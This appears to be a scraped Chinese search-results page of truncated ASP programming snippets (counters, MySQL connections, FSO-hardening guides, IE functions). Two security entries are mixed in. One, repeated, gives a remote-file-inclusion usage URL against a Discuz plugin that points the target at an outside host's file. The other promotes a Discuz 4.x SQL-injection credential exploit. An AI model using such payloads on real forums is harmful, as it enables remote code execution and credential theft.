搜索列表
-
如何随机显示图片计数器?
【编程10000问】count.asp< html >< head >< meta http-equiv="Content-Type"content="text/html; charset=gb2312" ><title>随风起舞之千变计数器</title></head><body><p><%dim outcountfile=server.mappath("aspcount.txt")set objfile=server.createobject("scripting.filesystemobject")' 定义一个服务器组件.se...
|如何|何随|随机|机显|显示|示图|图片|片计|计数|数器|器?|?| -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
Discuz! 4.x SQL injection / admin credentials disclosure exploit
【安全相关】前段时间发过Discuz! 5.0.0 GBK版本的EXP 今天在CN.Tink那里看到的4.x的,我去原站转了过来,然后找了个Discuz! 4.1.0测试了一下,成功,看下面截图,Discuz! 5.0.0 GBK版本的那个EXP又许多朋友不知道怎么用,当时我说了下,还是有朋友不明白,这次我截了图上来,不知道怎么用...
Discuz!4.xSQLinjection/admincredentialsdisclosureexploit -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
在ASP中连接MySQL数据库,最好的通过ODBC方法
【ASP编程】折腾了一阵,总算把ASP和MySQL连接完成了,有感,特写此文与大家一同分享。 查了很多资料,ASP和MySQL连接目前有两种办法:一个是使用组件,比较有名是MySQLX,可惜要99美元。二就是使用MyODBC 来连接,下面我们 就来看看第二种方式。 试验的平台: MySQL 4.0 For RadHat Linux (也可...
在ASP中连接MySQL数据库,最好的通过ODBC方法 -
构建免受 FSO 威胁虚拟主机(一)
【ASP编程】现在绝大多数的虚拟主机都禁用了 ASP 的标准组件:FileSystemObject,因为这个组件为 ASP 提供了强大的文件系统访问能力,可以对服务器硬盘上的任何文件进行读、写、复制、删除、改名等操作(当然,这是指在使用默认设置的 Windows NT / 2000 下才能做到)。但是禁止此组件后,引起的后果就是所有利用这个组件的 ...
|构建|建免|免受|受F|FS|SO|O威|威胁|胁虚|虚拟|拟主|主机|机(|(一|一)|)| -
类似于iis浏览的功能
【ASP编程】<!---将此文件存为folder_list.asp看看效果就知道了加上权限就可以方便自己了,---> <% 'const_domain_name为域名最后不要加斜杠 const const_domain_name="http://localhost" %> <style> b,img,a{font-size:9pt;line-height:150%;text-decoration:none;color:#0000cc;} span{font-...
|类似|似于|于i|ii|is|s浏|浏览|览的|的功|功能|能| -
在线实时开通FTP&WEB
【ASP编程】程序利用FSO+SERV-U(2.x版本)实现: 1、index.htm <html> <head> <title>宁波科宇网——个人网页申请</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <script language="Javascript"> ...
|在线|线实|实时|时开|开通|通F|FT|TP|Pa|am|mp|p;|;W|WE|EB|B| -
构建免受 FSO 威胁虚拟主机(二)
【ASP编程】在弹出的“选择 组”对话框中找到“Guests”,点“添加”,此组就会出现在下方的文本框中,然后点“确定”: <IMG SRC="http://202.100.116.12/paddy/bbsimages/fsosafe/007.gif" border=0> 出现的就是如下图所示的内容,点“确定”关闭此对话框: <IMG SRC="http://202.100.116...
|构建|建免|免受|受F|FS|SO|O威|威胁|胁虚|虚拟|拟主|主机|机(|(二|二)|)| -
构建免受 FSO 威胁虚拟主机(三)
【ASP编程】此时会弹出如下图所示的“安全”警告,点“删除”: <IMG SRC="http://202.100.116.12/paddy/bbsimages/fsosafe/012.gif" border=0> 此时安全选项卡中的所有组和用户都将被清空(如果没有清空,请使用“删除”将其清空),然后点“添加”按钮。 <IMG SRC="http://202.100.116.12/...
|构建|建免|免受|受F|FS|SO|O威|威胁|胁虚|虚拟|拟主|主机|机(|(三|三)|)| -
二级域名原理以及程序
【ASP编程】二级域名原理以及程序,申请即可开通 [普通框架式二级域名] 要达到二级名的效果,必须一下条件以及流程: 1、必须有一个顶级域名,而且此域名必须做好泛解析并做好指向。 2、必须有一台独立的服务器。泛解析的域名指向该服务器。 3、在服务器上的IIS建一个空的主机头名的web站点。 4、将默认的页面设置为你的二机解析程序(比...
|二级|级域|域名|名原|原理|理以|以及|及程|程序|序| -
IE功能汇总
【ASP编程】 <OBJECT id=WebBrowser height=0 width=0 classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2></OBJECT> <INPUT onclick=document.all.WebBrowser.ExecWB(1,1) type=button value=打开 name=Button1> <INPUT onclick=document.all.WebBrow...
|IE|E功|功能|能汇|汇总|总|